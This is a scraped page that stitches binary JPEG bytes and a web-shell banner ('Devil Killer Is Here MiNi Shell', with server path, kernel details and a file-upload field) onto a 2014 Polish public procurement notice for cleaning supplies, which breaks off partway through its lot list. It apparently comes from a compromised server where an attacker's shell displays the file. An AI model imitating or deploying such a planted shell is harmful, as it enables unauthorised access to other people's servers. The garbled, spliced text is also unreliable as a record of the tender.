JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140415/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140415/82829-N-2014.html

<p class="kh_header"><b>Warszawa: Dostaw środków i materiałów do utrzymania czystości do obiektów Centrum Usług Logistycznych</b><br>
<b>Numer ogłoszenia: 82829 - 2014; data zamieszczenia: 15.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Usług Logistycznych , ul. Słoneczna 37, 00-789 Warszawa, woj. mazowieckie, tel. 22 601 33 29, faks 22 601 50 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cul.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja Gospodarki Budżetowej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostaw środków i materiałów do utrzymania czystości do obiektów Centrum Usług Logistycznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są sukcesywne (partiami) wg potrzeb Zamawiającego dostawy środków i materiałów do utrzymania czystości do obiektów Centrum Usług Logistycznych. 2. Zamówienie zostało podzielone na 17 niżej wymienionych części:  1) Część nr 1 - Międzyzdroje; 2) Część nr 2 - Dziwnów; 3) Część nr 3 - Świnoujście; 4) Część nr 4 - Szczecin; 5) Część nr 5 - Jurata; 6) Część nr 6 - Ustka; 7) Część nr 7 - Olsztyn; 8) Część nr 8 - Gorzów Wlkp.; 9) Część nr 9 - Poznań; 10) Część nr 10 - Warszawa Hotele; 11) Część nr 11 - Warszawa Bursy; 12) Część nr 12 - Lotnisko Warszawa-Babice; 13) Część nr 13  - Wrocław; 14) Część nr 14 - Szklarska Poręba; 15) Część nr 15 - Opole; 16) Część nr 16 - Zakopane; 17) Część nr 17 - Polańczyk.
Wykonawca może złożyć ofertę do jednej lub większej ilości części.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.22.43.00-1, 39.81.13.00-3, 39.83.10.00-6, 39.83.12.10-1, 39.83.13.00-9, 39.83.16.00-2, 39.83.20.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 17.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium w postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek jeżeli wykaże wykonanie lub wykonywanie, w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 1 dostawy środków lub materiałów do utrzymania czystości do jednego odbiorcy o wartości nie mniejszej niż: 1) 20 000,00 zł brutto, w przypadku złożenia oferty do Części nr 1 - Międzyzdroje; 2) 5 000,0 zł w brutto, przypadku złożenia oferty do Części nr 2 - Dziwnów; 3) 9 000,00 zł brutto, w przypadku złożenia oferty do Części nr 3 - Świnoujście; 4) 2 000,00 zł brutto, w przypadku złożenia oferty do Części nr 4 - Szczecin; 5) 20 000,00 zł brutto, w przypadku złożenia oferty do Części nr 5 - Jurata; 6) 3 000,00 zł brutto, w przypadku złożenia oferty do Części nr 6 - Ustka; 7) 500,00 zł brutto, w przypadku złożenia oferty do Części nr 7 - Olsztyn; 8) 1 000,00 zł brutto, w przypadku złożenia oferty do Części nr 8 - Gorzów Wlkp.; 9) 3 000,00 zł brutto, w przypadku złożenia oferty do Części nr 9 - Poznań; 10) 17 000,00 zł brutto, w przypadku złożenia oferty do Części nr 10 - Warszawa Hotele; 
11) 8 000,00 zł brutto, w przypadku złożenia oferty do Części nr 11 - Warszawa Bursy; 12) 10 000,00 zł brutto, w przypadku złożenia oferty do Części nr 12 - Lotnisko Warszawa-Babice; 13) 1 200,00 zł brutto, w przypadku złożenia oferty do Części nr 13 - Wrocław; 14)	25 000,00 zł brutto, w przypadku złożenia oferty do Części nr 14 - Szklarska Poręba; 15) 1 500,00 zł brutto, w przypadku złożenia oferty do Części nr 15 - Opole; 16) 13 000,00 zł brutto, w przypadku złożenia oferty do Części nr 16 - Zakopane; 17) 5 000,00 zł brutto, w przypadku złożenia oferty do Części nr 17 - Polańczyk, wraz z dowodami, czy zostały wykonane lub są wykonywane należycie. W przypadku, gdy Wykonawca złoży ofertę do dwóch lub większej ilości części, Zamawiający uzna, że spełnił warunek dotyczący posiadania wiedzy i doświadczenia, gdy wykaże wykonanie lub wykonywanie co najmniej
1 dostawy środków lub materiałów do utrzymania czystości o wartości nie mniejszej niż największa spośród wymaganych dla części, do której składa ofertę.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>co najmniej 1 dostawy środków lub materiałów do utrzymania czystości do jednego odbiorcy o wartości nie mniejszej niż: 1) 20 000,00 zł brutto, w przypadku złożenia oferty do Części nr 1 - Międzyzdroje; 2) 5 000,0 zł w brutto, przypadku złożenia oferty do Części nr 2 - Dziwnów; 3) 9 000,00 zł brutto, w przypadku złożenia oferty do Części nr 3 - Świnoujście; 4) 2 000,00 zł brutto, w przypadku złożenia oferty do Części nr 4 - Szczecin; 5) 20 000,00 zł brutto, w przypadku złożenia oferty do Części nr 5 - Jurata; 6) 3 000,00 zł brutto, w przypadku złożenia oferty do Części nr 6 - Ustka; 7) 500,00 zł brutto, w przypadku złożenia oferty do Części nr 7 - Olsztyn; 8) 1 000,00 zł brutto, w przypadku złożenia oferty do Części nr 8 - Gorzów Wlkp.; 9) 3 000,00 zł brutto, w przypadku złożenia oferty do Części nr 9 - Poznań; 10) 17 000,00 zł brutto, w przypadku złożenia oferty do Części nr 10 - Warszawa Hotele; 11) 8 000,00 zł brutto, w przypadku złożenia oferty do Części nr 11 - Warszawa Bursy; 12) 10 000,00 zł brutto, w przypadku złożenia oferty do Części nr 12 - Lotnisko Warszawa-Babice; 13) 1 200,00 zł brutto, w przypadku złożenia oferty do Części nr 13 - Wrocław; 14)	25 000,00 zł brutto, w przypadku złożenia oferty do Części nr 14 - Szklarska Poręba; 15) 1 500,00 zł brutto, w przypadku złożenia oferty do Części nr 15 - Opole; 16) 13 000,00 zł brutto, w przypadku złożenia oferty do Części nr 16 - Zakopane; 17) 5 000,00 zł brutto, w przypadku złożenia oferty do Części nr 17 - Polańczyk, wraz z dowodami, czy zostały wykonane lub są wykonywane należycie.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W przypadku złożenia oferty z środkami czystości równoważnymi opisanym przez Zamawiającego, należy złożyć wraz z nią w celu wykazania ich równoważności, Karty Charakterystyki zaoferowanych środków</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany formularz ofertowy wraz z odpowiednimi formularzami kalkulacji cenowej 2. Pełnomocnictwo do reprezentowania Wykonawcy lub Wykonawców w przypadku, gdy: 1) ofertę podpisuje inna osoba niż Wykonawca, 2) ofertę składają Wykonawcy ubiegający się wspólnie o udzielenie zamówienia publicznego o treści wymaganej w art. 23 ust. 2 ustawy - dla ważności pełnomocnictwa wymaga sie podpisu prawnie upoważnionych przedstawicieli każdego z Wykonawców. Wszelka korespondencja będzie prowadzona wyłącznie z Pełnomocnikiem. Pełnomocnictwo powinno zawierać umocowanie do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy. 3. W przypadku, gdy Wykonawca w celu spełniania warunków udziału w postępowaniu będzie polegać na wiedzy i doświadczeniu innych podmiotów, zobowiązany jest - w celu oceny przez zamawiającego, czy dany wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący danego wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów - przedstawić stosowne dokumenty dotyczące, w szczególności: 1) zakresu dostępnych Wykonawcy zasobów innego podmiotu; 2) charakteru stosunku jaki będzie łączył Wykonawcę z innym podmiotem; 3) sposobu wykorzystania zasobów innego podmiotu przez wykonawcę, przy wykonaniu zamówienia; 4) ewentualnego zakresu i okresu udziału innego podmiotu w wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia istotnych zmian postanowień zawartej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych w pkt. 1 - 4 z uwzględnieniem podawanych warunków ich wprowadzenia. 1) Zmiana terminu: a) spowodowane siłą wyższą, w tym klęskami żywiołowymi, warunkami atmosferycznymi uniemożliwiającymi zrealizowanie danej dostawy w terminie; b) będące wynikiem czasowego wstrzymania produkcji towarów lub braków towarów na polskim rynku będących przedmiotem umowy, w tym będące następstwem działania organów administracji publicznej, z zastrzeżeniem pkt. 3. W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w lit. a - b termin danej dostawy może ulec odpowiedniemu przedłużeniu o czas niezbędny do należytego jej wykonania, nie dłużej jednak niż o okres tych okoliczności. 2) Zmiana okresu trwania umowy: Zmiany spowodowane nie wykupieniem pełnej ilości towaru. W takim przypadku Umowa może zostać przedłużona do czasu wykupienia pełnej ilości towaru określonego w Umowie. Zmiana ta nie może powodować zwiększenia wynagrodzenia Wykonawcy. 3) Zmiana sposobu spełnienia świadczenia spowodowane koniecznością dostawy towarów ze względu o których mowa w pkt. 1 lit. b  - Zamawiający w powyższym przypadku dopuszcza zakup towarów zamiennych, równoważnych (np. towarów w zamiennym opakowaniu lub towarów o tożsamej nazwie międzynarodowej innego producenta o innej nazwie handlowej), ale ich cena nie może przewyższać ceny towarów podstawowych; Wykonawca zobowiązany jest dostarczyć go na zasadach określonych w niniejszej umowie. 4) Zmiany wynagrodzenia Wykonawcy: a) zmiany spowodowane udzieleniem przez Wykonawcę upustów promocyjnych - W przypadku udzielenia przez Wykonawcę upustów promocyjnych dla klienta w okresie trwania umowy, upusty będą obowiązywały również dla tej umowy; b) zmiany spowodowane wzrostem albo zmniejszeniem stawki VAT -  jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów towarów po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia Wykonawcy o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez Wykonawcę; jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów towarów po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT zapłaconego przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.cul.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Usług Logistycznych w Warszawie, Zespół Obiektów OLIMPIA i JOWISZ w Poznaniu, 60-790 Poznań, ul. Taborowa 8, recepcja..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2014 godzina 14:00, miejsce: Centrum Usług Logistycznych w Warszawie, Zespół Obiektów OLIMPIA i JOWISZ w Poznaniu, 60-790 Poznań, ul. Taborowa 8, recepcja..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Międzyzdroje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków i materiałów do utrzymania czystości do Ośrodka Szkoleniowo-Wypoczynkowego w Międzyzdrojach, położonego przy ul. Krótka 1, 72-500 Międzyzdroje, w ilościach i asortymencie określonym w załączniku nr 1a do SIWZ - Formularz kalkulacji cenowej dla części nr 1, który został udostępniony na stronie internetowej Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.43.00-1, 39.81.13.00-3, 39.83.10.00-6, 39.83.12.10-1, 39.83.13.00-9, 39.83.16.00-2, 39.83.20.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dziwnów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków i materiałów do utrzymania czystości do Ośrodka Szkoleniowo-Wypoczynkowego w Dziwnowie, położonego przy ul. kpr. Koniecznego 13, 72-420 Dziwnów, w ilościach i asortymencie określonym w załączniku nr 1b do SIWZ - Formularz kalkulacji cenowej dla części nr 2, który został udostępniony na stronie internetowej Zamawiajacego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.43.00-1, 39.81.13.00-3, 39.83.10.00-6, 39.83.12.10-1, 39.83.16.00-2, 39.83.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Świnoujście.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków i materiałów do utrzymania czystości do Ośrodka Szkoleniowo-Wypoczynkowego w Świnoujściu, położonego przy ul. Słowackiego 4/6, 72-600 Świnoujście, w ilościach i asortymencie określonym w załączniku nr 1c do SIWZ - Formularz kalkulacji cenowej dla części nr 3, który został udostępniony na stronie internetowej Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.43.00-1, 39.81.13.00-3, 39.83.10.00-6, 39.83.12.10-1, 39.83.13.00-9, 39.83.16.00-2, 39.83.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Szczecin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków i materiałów do utrzymania czystości do Bursy CUL w Szczecinie, położonej przy ul. Sierpowa 4, 70-016 Szczecin oraz obiektu HOTELIK SŁOWIAŃSKI w Szczecinie położonego przy ul. Potulicka, 70-233 Szczecin w ilościach i asortymencie określonym w załączniku nr 1d do SIWZ - Formularz kalkulacji cenowej dla części nr 4, który został udostępniony na stronie internetowej Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.81.13.00-3, 39.83.10.00-6, 39.83.12.10-1, 39.83.13.00-9, 39.83.16.00-2, 39.83.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Jurata.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków i materiałów do utrzymania czystości do Ośrodka Szkoleniowo-Wypoczynkowego KAPER w Juracie, położonego przy ul. Mestwina 45, 84-141 Jurata, w ilościach i asortymencie określonym w załączniku nr 1e do SIWZ - Formularz kalkulacji cenowej dla części nr 5, który został udostępniony na stronie internetowej Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.81.13.00-3, 39.83.10.00-6, 39.83.12.10-1, 39.83.13.00-9, 39.83.16.00-2, 39.83.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Ustka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków i materiałów do utrzymania czystości do Ośrodka Szkoleniowo-Rekreacyjnego w Ustce-Uroczysku, 76-270 Ustka, w ilościach i asortymencie określonym w załączniku nr 1f do SIWZ - Formularz kalkulacji cenowej dla części nr 6, który został udostępniony na stronie internetowej Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.43.00-1, 39.81.13.00-3, 39.83.10.00-6, 39.83.12.10-1, 39.83.13.00-9, 39.83.16.00-2, 39.83.20.00-3.</p></li>
